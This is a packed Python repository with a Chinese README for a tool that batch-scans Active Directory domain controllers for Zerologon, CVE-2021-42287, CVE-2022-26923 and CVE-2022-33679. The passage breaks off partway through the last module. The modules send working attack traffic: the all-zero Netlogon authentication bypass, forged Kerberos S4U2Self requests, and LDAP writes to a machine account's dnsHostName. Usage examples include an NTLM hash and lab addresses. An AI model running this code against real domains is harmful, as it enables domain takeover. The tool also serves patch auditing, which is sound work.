├── .gitignore
├── README.MD
├── exploits
    ├── __init__.py
    ├── cve_2020_1472.py
    ├── cve_2021_42287.py
    ├── cve_2022_26923.py
    └── cve_2022_33679.py
├── lib
    ├── __init__.py
    ├── runner.py
    └── utils.py
├── main.py
└── requirements.txt


/.gitignore:
--------------------------------------------------------------------------------
1 | /.idea/.gitignore
2 | /.idea/advul.iml
3 | /.idea/misc.xml
4 | /.idea/modules.xml
5 | /.idea/inspectionProfiles/profiles_settings.xml
6 | /.idea/inspectionProfiles/Project_Default.xml
7 | /.idea/vcs.xml
8 | *.pyc
9 | 


--------------------------------------------------------------------------------
/README.MD:
--------------------------------------------------------------------------------
  1 | # AD高危漏洞扫描/利用工具
  2 | 
  3 | 
  4 | &emsp;&emsp;AD高危漏洞扫描/利用工具, 对AD高危漏洞进行快速批量检测。
  5 | 
  6 | ## 模式
  7 | ### 单机检测
  8 |    
  9 | &emsp;&emsp;未指定批量检测相关参数时, 默认使用该模式。
 10 | 
 11 | ### 批量检测
 12 | &emsp;&emsp;当指定相关参数时(-all-dc/-tf), 启用批量检测模式, 在该模式下, 未指定目标ip文件时, 将通过dns解析域名获取所有域控ip, 并进行批量探测, 若指定ip列表文件, 则只对指定的ip列表进行扫描。
 13 | 
 14 | ## 导航
 15 | 
 16 | - [CVE-2020-1472](#cve-2020-1472)
 17 | - [CVE-2021-42287](#cve-2021-42287)
 18 | - [CVE-2022-26923](#cve-2022-26923)
 19 | - [CVE-2022-33679](#cve-2022-33679)
 20 | 
 21 | ## 使用
 22 | ```text
 23 | PS C:\> python.exe advul/main.py 
 24 | usage: main.py [-h] [-ts] [-debug] [-dc-ip ip address] [-target-ip ip address]
 25 |                [-target dns/ip address] [-ns nameserver] [-dns-tcp]
 26 |                [-timeout seconds] [-u username@domain] [-p password]
 27 |                [-hashes [LMHASH:]NTHASH] [-k] [-sspi] [-aes hex key]
 28 |                [-no-pass] [-all-dc] [-tf target file] [--threads threads]
 29 |                [-ntlm-method {rpc,smb}] [-ldap-scheme {ldap,ldaps}]
 30 |                {33679,26923,42287,zerologon}
 31 | 
 32 | Active Directory Vulnerability Scanner
 33 | 
 34 | positional arguments:
 35 |   {33679,26923,42287,zerologon}
 36 |                         modules
 37 | 
 38 | options:
 39 |   -h, --help            Show this help message and exit
 40 |   -ts                   adds timestamp to every logging output
 41 |   -debug                Turn DEBUG output ON
 42 | 
 43 | connection options:
 44 |   -dc-ip ip address     IP Address of the domain controller. If omitted it
 45 |                         will use the domain part (FQDN) specified in the
 46 |                         target parameter
 47 |   -target-ip ip address
 48 |                         IP Address of the target machine. If omitted it will
 49 |                         use whatever was specified as target. This is useful
 50 |                         when target is the NetBIOS name and you cannot resolve
 51 |                         it
 52 |   -target dns/ip address
 53 |                         DNS Name or IP Address of the target machine. Required
 54 |                         for Kerberos or SSPI authentication
 55 |   -ns nameserver        Nameserver for DNS resolution
 56 |   -dns-tcp              Use TCP instead of UDP for DNS queries
 57 |   -timeout seconds      Timeout for connections
 58 | 
 59 | authentication options:
 60 |   -u username@domain, -username username@domain
 61 |                         Username. Format: username@domain
 62 |   -p password, -password password
 63 |                         Password
 64 |   -hashes [LMHASH:]NTHASH
 65 |                         NTLM hash, format is [LMHASH:]NTHASH
 66 |   -k                    Use Kerberos authentication. Grabs credentials from
 67 |                         ccache file (KRB5CCNAME) based on target parameters.
 68 |                         If valid credentials cannot be found, it will use the
 69 |                         ones specified in the command line
 70 |   -sspi                 Use Windows Integrated Authentication (SSPI)
 71 |   -aes hex key          AES key to use for Kerberos Authentication (128 or 256
 72 |                         bits)
 73 |   -no-pass              Don't ask for password (useful for -k and -sspi)
 74 | 
 75 | multi targets options:
 76 |   -all-dc               attack all dcs
 77 |   -tf target file       path to targets file
 78 |   --threads threads     number of worker threads
 79 | 
 80 | ntlm info options:
 81 |   -ntlm-method {rpc,smb}
 82 |                         method for ntlm info detection
 83 | 
 84 | ldap connection options:
 85 |   -ldap-scheme {ldap,ldaps}
 86 |                         method for ntlm info detection
 87 | ```
 88 | ## CVE-2020-1472
 89 |    &emsp;&emsp;理论上检测zerologon只需要知道目标ip即可，工具在仅有目标ip时，利用ntlminfo获取目标主机名，再通过常规手段进行zerologon漏洞探测。
 90 | ### 使用示例
 91 | 
 92 | #### 扫描单个目标
 93 |    ```text
 94 |    PS C:\> python.exe advul/main.py -ts -dc-ip 192.168.31.110 zerologon 
 95 |    
 96 |    [2023-07-16 03:58:15] [-] Username is not specified
 97 |    [2023-07-16 03:58:15] [*] checking target 192.168.31.110...
 98 |    [2023-07-16 03:58:17] [*] [192.168.31.110] is vulnerable to zero logon!!!
 99 |    ```
100 | #### 扫描单个目标(指定参数)
101 |    ```text
102 | PS C:\> python.exe advul/main.py -ts -dc-ip 192.168.31.110 -auth-method 2 -target-name DC01 zerologon 
103 | 
104 | [2023-07-16 04:01:16] [-] Username is not specified
105 | [2023-07-16 04:01:16] [*] checking target 192.168.31.110...
106 | [2023-07-16 04:01:16] [*] [192.168.31.110] is vulnerable to zero logon!!!
107 | ```
108 | 
109 | #### 批量扫
110 |    ```text
111 | PS C:\> python.exe advul/main.py -ts -all-dc -dc-ip 192.168.31.110 zerologon 
112 | 
113 | [2023-07-16 04:02:59] [-] Username is not specified
114 | [2023-07-16 04:02:59] [*] checking target 192.168.31.111...
115 | [2023-07-16 04:02:59] [*] checking target 192.168.31.110...
116 | [2023-07-16 04:03:02] [*] [192.168.31.111] might not vulnerable:<
117 | [2023-07-16 04:03:03] [*] [192.168.31.110] is vulnerable to zero logon!!!
118 | 
119 | 
120 | ```
121 | 
122 | ## CVE-2021-42287
123 |    &emsp;&emsp;使用域内任意用户凭据进行Kerberos认证, 向目标域控申请S4U2Self票据并遍历Pac属性, 通过ulType=0x10类型Pac的存在可以判断目标域控是否安装更新补丁。
124 | ### 使用示例
125 | 
126 | #### 扫描单个目标
127 |    ```text
128 | PS C:\> python.exe advul/main.py -u JDCA$@jd.local -hashes 48f925772624af82147e750a45b912a8 -dc-ip 192.168.31.110 42287 
129 |     
130 |     [*] [192.168.31.110] is vulnerable to 42287!!!!
131 | ```
132 | 
133 | #### 批量扫描
134 |    ```text
135 |    PS C:\> python.exe advul/main.py -ts -all-dc -u JDCA$@jd.local -hashes 48f925772624af82147e750a45b912a8 -dc-ip 192.168.31.110 42287 
136 |    
137 |    [2023-07-15 02:52:28] [*] [192.168.31.111] is patched :<
138 |    [2023-07-15 02:52:28] [*] [192.168.31.110] is vulnerable to 42287!!!!
139 |    ```
140 | 
141 | ## CVE-2022-26923
142 |    &emsp;&emsp;利用域内机器用户凭据登录目标域控Ldap服务, 对该域控Ldap数据库中自身的dnsHostName属性进行修改, 若修改成功, 说明未安装补丁, 若提示约束冲突说明已安装补丁。
143 | ### 使用示例
144 | 
145 | #### 扫描单个目标
146 |    ```text
147 |    PS C:\> python.exe advul/main.py -u JDCA$ -hashes 48f925772624af82147e750a45b912a8 -dc-ip 192.168.31.110 26923 
148 |    
149 |    [*] [192.168.31.110] success, target is vulnerable!!!
150 |    ```
151 | #### 批量扫描
152 |    ```text
153 |    PS C:\> python.exe advul/main.py -ts -all-dc -u JDCA$@jd.local -hashes 48f925772624af82147e750a45b912a8 -dc-ip 192.168.31.110 26923 
154 | 
155 |    [2023-07-15 02:59:48] [*] [192.168.31.110] success, target is vulnerable!!!
156 |    [2023-07-15 02:59:48] [*] [192.168.31.111] constraintViolation, target is not vulnerable :<
157 |    ```
158 | 
159 | ## CVE-2022-33679
160 |    &emsp;&emsp;向目标域控发起Kerberos预认证, 将加密方式设置为RC4-MD4(-128), 若返回KDC_ERR_ETYPE_NOSUPP(14)说明已安装更新补丁, 若返回KDC_ERR_PREAUTH_REQUIRED(25), 说明存在漏洞。
161 |    
162 | ### 使用示例
163 | 
164 | #### 扫描单个目标
165 |    ```text
166 |    PS C:\> python.exe advul/main.py -ts -dc-ip 192.168.31.110 -u mayun@jd.local 33679 
167 | 
168 |    [2023-07-15 03:05:49] [*] [192.168.31.110] has 33679
169 |    ```
170 | 
171 | #### 批量扫描
172 |    ```text
173 |    PS C:\> python.exe advul/main.py -ts -tf dcs.txt -dc-ip 192.168.31.110 -u mayun@jd.local 33679 
174 | 
175 |    [2023-07-15 03:04:24] [*] [192.168.31.110] has 33679
176 |    [2023-07-15 03:04:24] [*] [192.168.31.111] is not vuln
177 |    ```
178 | 


--------------------------------------------------------------------------------
/exploits/__init__.py:
--------------------------------------------------------------------------------
 1 | from .cve_2022_33679 import CVE202233679
 2 | from .cve_2022_26923 import CVE202226923
 3 | from .cve_2021_42287 import CVE202142287
 4 | from .cve_2020_1472 import CVE20201472
 5 | 
 6 | # 这里注册各个模块的实现类
 7 | 
 8 | ALL_EXPLOITS = {
 9 |     '33679': CVE202233679,
10 |     '26923': CVE202226923,
11 |     '42287': CVE202142287,
12 |     'zerologon' : CVE20201472,
13 | }


--------------------------------------------------------------------------------
/exploits/cve_2020_1472.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import logging
  3 | import sys
  4 | 
  5 | from certipy.lib.target import Target
  6 | from impacket import ntlm
  7 | from impacket.dcerpc.v5 import nrpc, epm
  8 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
  9 | from impacket.dcerpc.v5.transport import DCERPCTransportFactory
 10 | 
 11 | from lib import Runner
 12 | from lib.utils import ntlm_info
 13 | 
 14 | str_binding_map = {
 15 |     'smb': f'ncacn_np:%s[\\PIPE\\netlogon]',
 16 |     'tcp': '',
 17 | }
 18 | 
 19 | rpc_method_map = {
 20 |     # 1: nrpc.hNetrServerAuthenticate,
 21 |     # mimikatz用这个
 22 |     2: nrpc.hNetrServerAuthenticate2,
 23 |     # cve-2020-1472-exploit.py、set_empty_pw.py、zerologon.py都用这个
 24 |     3: nrpc.hNetrServerAuthenticate3,
 25 | }
 26 | 
 27 | default_params = {
 28 |     'target_name': None,
 29 |     # 默认走tcp，应该鞥提高一点效率，如果rpc端口不通的话可以试试smb
 30 |     'rpc_transport': 'tcp',
 31 |     # 默认rpc方法为 hNetrServerAuthenticate3
 32 |     'auth_method': 3,
 33 |     # 根据大佬们研究，尝试次数为200次时，漏报概率为0.04%，这里默认设置为600次，对域控应该不会有影响吧。
 34 |     'max_attempts': 600
 35 | }
 36 | 
 37 | 
 38 | def add_add_argument_group(parser: argparse.ArgumentParser):
 39 |     group = parser.add_argument_group('zerologon options')
 40 |     group.add_argument('-target-name', help='目标域控机器名')
 41 |     group.add_argument('-rpc-transport', choices=str_binding_map.keys(), help='rpc transport for zerologon test')
 42 |     group.add_argument('-auth-method', choices=rpc_method_map.keys(), help='rpc method', type=int)
 43 |     group.add_argument('-max-attempts', help='zerologon测试最大尝试次数', type=int)
 44 | 
 45 | 
 46 | def zerologon(target_ip, target_name, rpc_transport, auth_method, max_attempts):
 47 |     # 默认会自动获取机器名，当然也可以指定机器名
 48 |     # 默认使用rpc over tcp, rpc函数使用NetrServerAuthenticate3
 49 |     if target_name is None:
 50 |         target_info = ntlm_info(target_ip)
 51 |         target_name = target_info[ntlm.NTLMSSP_AV_HOSTNAME]
 52 | 
 53 |     # 防止输错机器名
 54 |     target_name = target_name.rstrip('$')
 55 |     if rpc_transport == 'tcp':
 56 |         str_binding = epm.hept_map(target_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
 57 |     else:
 58 |         str_binding = str_binding_map[rpc_transport] % target_ip
 59 |     logging.debug({'target name': target_name, 'rpc binding': str_binding})
 60 |     dce = DCERPCTransportFactory(str_binding).get_dce_rpc()
 61 |     # rpc流量加密
 62 |     dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
 63 |     dce.connect()
 64 |     dce.bind(nrpc.MSRPC_UUID_NRPC)
 65 | 
 66 |     # Use an all-zero challenge and credential.
 67 |     plaintext = b'\x00' * 8
 68 |     ciphertext = b'\x00' * 8
 69 | 
 70 |     # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
 71 |     flags = 0x212fffff
 72 | 
 73 |     primary_name = f'\\\\{target_name}\x00'
 74 |     # 这个参数随便填
 75 |     computer_name = f'BTEAM-PC\x00'
 76 |     # 这个参数必须是域控的samAccountName，名称和ip可以不对应
 77 |     account_name = f'{target_name}$\x00'
 78 |     logging.info(f'checking target {target_ip}...')
 79 |     is_vulnerable = False
 80 |     counts = 0
 81 |     for _ in range(max_attempts):
 82 |         counts += 1
 83 |         params = {
 84 |             'dce': dce,
 85 |             'primaryName': primary_name,
 86 |             'computerName': computer_name,
 87 |             'clientChallenge': plaintext
 88 |         }
 89 |         nrpc.hNetrServerReqChallenge(**params)
 90 | 
 91 |         params = {
 92 |             'dce': dce,
 93 |             'primaryName': primary_name,
 94 |             'accountName': account_name,
 95 |             'secureChannelType': nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
 96 |             'computerName': computer_name,
 97 |             'clientCredential': ciphertext,
 98 |             'negotiateFlags': flags
 99 |         }
100 |         try:
101 |             server_auth = rpc_method_map[auth_method](**params)
102 | 
103 |             # It worked!
104 |             assert server_auth['ErrorCode'] == 0
105 |             is_vulnerable = True
106 |             break
107 | 
108 |         except nrpc.DCERPCSessionError as ex:
109 |             # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
110 |             if ex.get_error_code() == 0xc0000022:
111 |                 continue
112 |             else:
113 |                 logging.debug(f'Unexpected error code from DC: {ex}.')
114 |         except BaseException as ex:
115 |             print(f'Unexpected error: {ex}.')
116 |     if is_vulnerable:
117 |         logging.info(f'[{target_ip}] is vulnerable to zero logon!!! try counts: {counts}')
118 |     else:
119 |         logging.info(f'[{target_ip}] might not vulnerable:<')
120 | 
121 | 
122 | class CVE20201472(Runner):
123 |     def __init__(self, target: Target, opts):
124 |         super().__init__(target, required_params=['dc_ip'])
125 |         self._target = target
126 |         self._opts = opts
127 | 
128 |     def run(self, target_ip=None):
129 |         if target_ip is None:
130 |             target_ip = self._target.dc_ip
131 |         user_pots = {}
132 |         [
133 |             user_pots.update(
134 |                 {it: getattr(self._opts, it)}
135 |             )
136 |             for it in default_params.keys()
137 |             if getattr(self._opts, it)
138 |         ]
139 |         default_params.update(user_pots)
140 |         zerologon(target_ip, **default_params)
141 | 


--------------------------------------------------------------------------------
/exploits/cve_2021_42287.py:
--------------------------------------------------------------------------------
  1 | import datetime
  2 | import logging
  3 | import struct
  4 | from binascii import unhexlify
  5 | import random
  6 | 
  7 | from certipy.lib.target import Target
  8 | from impacket.krb5 import constants
  9 | from impacket.krb5.asn1 import AS_REP, AP_REQ, seq_set, Authenticator, \
 10 |     TGS_REQ, PA_FOR_USER_ENC, Ticket as TicketAsn1, seq_set_iter, TGS_REP, EncTicketPart, AD_IF_RELEVANT
 11 | from impacket.krb5.crypto import _HMACMD5, Key, Enctype, _enctype_table
 12 | from impacket.krb5.kerberosv5 import getKerberosTGT, sendReceive
 13 | from impacket.krb5.pac import PACTYPE, PAC_INFO_BUFFER
 14 | from impacket.krb5.types import Principal, KerberosTime, Ticket
 15 | from pyasn1.codec.der import decoder, encoder
 16 | from pyasn1.type.univ import noValue
 17 | 
 18 | from lib.runner import Runner
 19 | 
 20 | 
 21 | def get_pac(target: Target, kdc=None) -> bytes:
 22 |     userName = Principal(target.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 23 |     tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, target.password, target.domain,
 24 |                                                             unhexlify(target.lmhash), unhexlify(target.nthash), '',
 25 |                                                             kdc)
 26 |     decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
 27 | 
 28 |     # Extract the ticket from the TGT
 29 |     ticket = Ticket()
 30 |     ticket.from_asn1(decodedTGT['ticket'])
 31 | 
 32 |     apReq = AP_REQ()
 33 |     apReq['pvno'] = 5
 34 |     apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
 35 | 
 36 |     opts = list()
 37 |     apReq['ap-options'] = constants.encodeFlags(opts)
 38 |     seq_set(apReq, 'ticket', ticket.to_asn1)
 39 | 
 40 |     authenticator = Authenticator()
 41 |     authenticator['authenticator-vno'] = 5
 42 |     authenticator['crealm'] = str(decodedTGT['crealm'])
 43 | 
 44 |     clientName = Principal()
 45 |     clientName.from_asn1(decodedTGT, 'crealm', 'cname')
 46 | 
 47 |     seq_set(authenticator, 'cname', clientName.components_to_asn1)
 48 | 
 49 |     now = datetime.datetime.utcnow()
 50 |     authenticator['cusec'] = now.microsecond
 51 |     authenticator['ctime'] = KerberosTime.to_asn1(now)
 52 | 
 53 |     if logging.getLogger().level == logging.DEBUG:
 54 |         logging.debug('AUTHENTICATOR')
 55 |         print(authenticator.prettyPrint())
 56 |         print('\n')
 57 |     encodedAuthenticator = encoder.encode(authenticator)
 58 | 
 59 |     # Key Usage 7
 60 |     # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
 61 |     # TGS authenticator subkey), encrypted with the TGS session
 62 |     # key (Section 5.5.1)
 63 |     encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
 64 | 
 65 |     apReq['authenticator'] = noValue
 66 |     apReq['authenticator']['etype'] = cipher.enctype
 67 |     apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
 68 | 
 69 |     encodedApReq = encoder.encode(apReq)
 70 | 
 71 |     tgsReq = TGS_REQ()
 72 | 
 73 |     tgsReq['pvno'] = 5
 74 |     tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
 75 | 
 76 |     tgsReq['padata'] = noValue
 77 |     tgsReq['padata'][0] = noValue
 78 |     tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
 79 |     tgsReq['padata'][0]['padata-value'] = encodedApReq
 80 | 
 81 |     # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
 82 |     # requests a service ticket to itself on behalf of a user. The user is
 83 |     # identified to the KDC by the user's name and realm.
 84 |     clientName = Principal(target.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 85 | 
 86 |     S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
 87 |     S4UByteArray += (target.username + target.domain).encode() + b'Kerberos'
 88 | 
 89 |     # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
 90 |     # with the following three parameters: the session key of the TGT of
 91 |     # the service performing the S4U2Self request, the message type value
 92 |     # of 17, and the byte array S4UByteArray.
 93 |     checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
 94 | 
 95 |     paForUserEnc = PA_FOR_USER_ENC()
 96 |     seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
 97 |     paForUserEnc['userRealm'] = target.domain
 98 |     paForUserEnc['cksum'] = noValue
 99 |     paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
100 |     paForUserEnc['cksum']['checksum'] = checkSum
101 |     paForUserEnc['auth-package'] = 'Kerberos'
102 | 
103 |     if logging.getLogger().level == logging.DEBUG:
104 |         logging.debug('PA_FOR_USER_ENC')
105 |         print(paForUserEnc.prettyPrint())
106 | 
107 |     encodedPaForUserEnc = encoder.encode(paForUserEnc)
108 | 
109 |     tgsReq['padata'][1] = noValue
110 |     tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
111 |     tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
112 | 
113 |     reqBody = seq_set(tgsReq, 'req-body')
114 | 
115 |     opts = list()
116 |     opts.append(constants.KDCOptions.forwardable.value)
117 |     opts.append(constants.KDCOptions.renewable.value)
118 |     opts.append(constants.KDCOptions.renewable_ok.value)
119 |     opts.append(constants.KDCOptions.canonicalize.value)
120 |     opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
121 | 
122 |     reqBody['kdc-options'] = constants.encodeFlags(opts)
123 | 
124 |     serverName = Principal(target.username, type=constants.PrincipalNameType.NT_UNKNOWN.value)
125 |     # serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
126 | 
127 |     seq_set(reqBody, 'sname', serverName.components_to_asn1)
128 |     reqBody['realm'] = str(decodedTGT['crealm'])
129 | 
130 |     now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
131 | 
132 |     reqBody['till'] = KerberosTime.to_asn1(now)
133 |     reqBody['nonce'] = random.getrandbits(31)
134 |     seq_set_iter(reqBody, 'etype',
135 |                  (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
136 | 
137 |     # If you comment these two lines plus enc_tkt_in_skey as option, it is bassically a S4USelf
138 |     myTicket = ticket.to_asn1(TicketAsn1())
139 |     seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
140 | 
141 |     if logging.getLogger().level == logging.DEBUG:
142 |         logging.debug('Final TGS')
143 |         print(tgsReq.prettyPrint())
144 | 
145 |     message = encoder.encode(tgsReq)
146 | 
147 |     r = sendReceive(message, target.domain, kdc)
148 | 
149 |     tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
150 | 
151 |     if logging.getLogger().level == logging.DEBUG:
152 |         logging.debug('TGS_REP')
153 |         print(tgs.prettyPrint())
154 | 
155 |     cipherText = tgs['ticket']['enc-part']['cipher']
156 | 
157 |     # Key Usage 2
158 |     # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
159 |     #  application session key), encrypted with the service key
160 |     #  (section 5.4.2)
161 | 
162 |     newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
163 | 
164 |     # Pass the hash/aes key :P
165 |     if target.nthash != '':
166 |         key = Key(newCipher.enctype, unhexlify(target.nthash))
167 |     else:
168 |         if newCipher.enctype == Enctype.RC4:
169 |             key = newCipher.string_to_key(target.password, '', None)
170 |         else:
171 |             key = newCipher.string_to_key(target.password, target.domain + target.username, None)
172 | 
173 |     try:
174 |         # If is was plain U2U, this is the key
175 |         plainText = newCipher.decrypt(key, 2, str(cipherText))
176 |     except:
177 |         # S4USelf + U2U uses this other key
178 |         plainText = cipher.decrypt(sessionKey, 2, cipherText)
179 | 
180 |     return plainText
181 | 
182 | 
183 | def check_pac(data):
184 |     enc_ticket_part = decoder.decode(data, asn1Spec=EncTicketPart())[0]
185 |     ad_if_relevant = decoder.decode(enc_ticket_part['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
186 |     # So here we have the PAC
187 |     pac_type = PACTYPE(ad_if_relevant[0]['ad-data'].asOctets())
188 |     buff = pac_type['Buffers']
189 |     new_pac_found = False
190 |     for buffer_n in range(pac_type['cBuffers']):
191 |         infoBuffer = PAC_INFO_BUFFER(buff)
192 |         if logging.getLogger().level == logging.DEBUG:
193 |             print("TYPE 0x%x" % infoBuffer['ulType'])
194 |         if infoBuffer['ulType'] == 0x10:
195 |             new_pac_found = True
196 |         buff = buff[len(infoBuffer):]
197 | 
198 |     return new_pac_found
199 | 
200 | 
201 | class CVE202142287(Runner):
202 |     def __init__(self, target: Target, opts):
203 |         """
204 |             33679漏洞检测
205 |             必要条件：
206 |                 1. 一个域内存在的用户（非禁用状态）
207 |                 2. 域名
208 |                 3. 域控ip
209 |             python依赖：
210 |                 1. impacket
211 |                 2. certipy
212 |             """
213 |         super().__init__(target=target,
214 |                          required_params=['username', ('hashes', 'password'), 'domain', 'dc_ip'])
215 |         self._target = target
216 |         self._opts = opts
217 | 
218 |     def run(self, target_ip=None):
219 |         if target_ip is not None:
220 |             target_ip = target_ip
221 |         else:
222 |             target_ip = self._target.dc_ip
223 |         logging.debug(f'getting pac...')
224 |         pac = get_pac(self._target, target_ip)
225 |         if pac:
226 |             logging.debug(f'pac got! check pac next.')
227 |             if check_pac(pac):
228 |                 logging.info(f'[{target_ip}] is patched :<')
229 |             else:
230 |                 logging.info(f'[{target_ip}] is vulnerable to 42287!!!!')
231 |         else:
232 |             logging.error(f'pac is empty, please check.<')
233 | 
234 | 
235 | if __name__ == '__main__':
236 |     t = Target.create(domain='jd.local', username='JDCA$', hashes='48f925772624af82147e750a45b912a8',
237 |                       dc_ip='192.168.31.110')
238 |     print(t)
239 |     pac = get_pac(target=t, kdc='192.168.31.111')
240 |     print(check_pac(pac))
241 | 


--------------------------------------------------------------------------------
/exploits/cve_2022_26923.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | 
 3 | import ldap3
 4 | from copy import deepcopy
 5 | from certipy.lib.ldap import LDAPConnection
 6 | from certipy.lib.target import Target
 7 | 
 8 | from lib.runner import Runner
 9 | 
10 | 
11 | class CVE202226923(Runner):
12 |     def __init__(self, target: Target, opts):
13 |         """
14 |             cve-2022-26923漏洞检测
15 |             必要条件：
16 |                 1. 一个域内存在的机器用户（非禁用状态）
17 |                 2. 机器用户的密码或者hash
18 |                 3. 域控ip
19 |             """
20 |         super().__init__(target=target,
21 |                          required_params=['username', ('password', 'hashes'), 'dc_ip'])
22 |         self._connection = None
23 |         self._target = target
24 |         self._opts = opts
25 | 
26 |     def run(self, target_ip=None):
27 |         """
28 |             检测原理：利用一个【机器账户】的身份去域控上将自己的dnsHostName属性修改为与原来不同的值，
29 |             如果能够修改成功，表示存在CVE-2022-26923
30 |             如果返回错误码19，表示该服务器已打补丁
31 |             如果返回错误码49，表示密码错误
32 |             具体错误码参考 https://ldap.com/ldap-result-code-reference/
33 |             """
34 |         if target_ip is not None:
35 |             target_ip = target_ip
36 |         else:
37 |             target_ip = self._target.dc_ip
38 |         _target = deepcopy(self._target)
39 |         _target.dc_ip = target_ip
40 |         _target.target_ip = target_ip
41 |         _connection = LDAPConnection(_target, self._opts.ldap_scheme)
42 |         _connection.connect()
43 |         machine_user = _connection.get_user(self._target.username)
44 |         logging.debug(f'got user {machine_user}')
45 |         dns_hostname = machine_user['attributes'].get('dnshostname')
46 |         # 修改后的dns必须和当前域名匹配，否则会产生报错（约束限制）
47 |         if dns_hostname:
48 |             new_dns_hostname = '.'.join(['amulab-netstar'] + dns_hostname.split('.')[1:])
49 |         else:
50 |             new_dns_hostname = 'ad-lib.' + self._target.domain
51 |             dns_hostname = new_dns_hostname
52 |         logging.debug(f'setting a new dnsHostname : {new_dns_hostname}')
53 |         result = _connection.modify(machine_user.get('distinguishedName'), {
54 |             'dnsHostname': (ldap3.MODIFY_REPLACE, new_dns_hostname)
55 |         })
56 |         if result["result"] == 0:
57 |             logging.info(f'[{target_ip}] success, target is vulnerable!!!')
58 |             # modify success, restore original dns if exists
59 |             logging.debug(f'restoring old dnsHostname')
60 |             result = _connection.modify(machine_user.get('distinguishedName'), {
61 |                 'dnsHostname': (ldap3.MODIFY_REPLACE, dns_hostname)
62 |             })
63 |             if result["result"] == 0:
64 |                 logging.debug(f'old dnsHostname restored.')
65 |             else:
66 |                 logging.error(f'unknown error happened when clear dns {result["result"]}')
67 |         elif result["result"] == 19:
68 |             logging.info(f'[{target_ip}] constraintViolation, target is not vulnerable :<')
69 |         else:
70 |             logging.error(f'unknown error happened {result["result"]}'
71 |                           f'check here https://ldap.com/ldap-result-code-reference/')
72 | 
73 | 
74 | if __name__ == '__main__':
75 |     logging.getLogger().setLevel(logging.DEBUG)
76 |     target = Target.create(
77 |         username='JDCA$',
78 |         hashes='48f925772624af82147e750a45b912a8',
79 |         dc_ip='192.168.31.110'
80 |     )
81 |     runner = CVE202226923(target)
82 |     runner.run()


--------------------------------------------------------------------------------
/exploits/cve_2022_33679.py:
--------------------------------------------------------------------------------
  1 | import logging
  2 | 
  3 | from certipy.lib.target import Target
  4 | 
  5 | import datetime
  6 | import random
  7 | 
  8 | from impacket.krb5 import constants
  9 | from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, seq_set, seq_set_iter
 10 | from impacket.krb5.kerberosv5 import sendReceive, KerberosError
 11 | from impacket.krb5.types import Principal, KerberosTime
 12 | from pyasn1.codec.der import encoder
 13 | from pyasn1.type.univ import noValue
 14 | 
 15 | from lib.runner import Runner
 16 | 
 17 | try:
 18 |     rand = random.SystemRandom()
 19 | except NotImplementedError:
 20 |     rand = random
 21 |     pass
 22 | 
 23 | 
 24 | def has_33679(user, domain, kdcHost):
 25 |     asReq = AS_REQ()
 26 |     domain = domain.upper()
 27 |     serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 28 |     clientName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 29 | 
 30 |     pacRequest = KERB_PA_PAC_REQUEST()
 31 |     pacRequest['include-pac'] = True
 32 |     encodedPacRequest = encoder.encode(pacRequest)
 33 | 
 34 |     asReq['pvno'] = 5
 35 |     asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
 36 | 
 37 |     asReq['padata'] = noValue
 38 |     asReq['padata'][0] = noValue
 39 |     asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
 40 |     asReq['padata'][0]['padata-value'] = encodedPacRequest
 41 | 
 42 |     reqBody = seq_set(asReq, 'req-body')
 43 | 
 44 |     opts = list()
 45 |     opts.append(constants.KDCOptions.forwardable.value)
 46 |     opts.append(constants.KDCOptions.renewable.value)
 47 |     opts.append(constants.KDCOptions.proxiable.value)
 48 |     reqBody['kdc-options'] = constants.encodeFlags(opts)
 49 | 
 50 |     seq_set(reqBody, 'sname', serverName.components_to_asn1)
 51 |     seq_set(reqBody, 'cname', clientName.components_to_asn1)
 52 | 
 53 |     reqBody['realm'] = domain
 54 | 
 55 |     now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
 56 |     reqBody['till'] = KerberosTime.to_asn1(now)
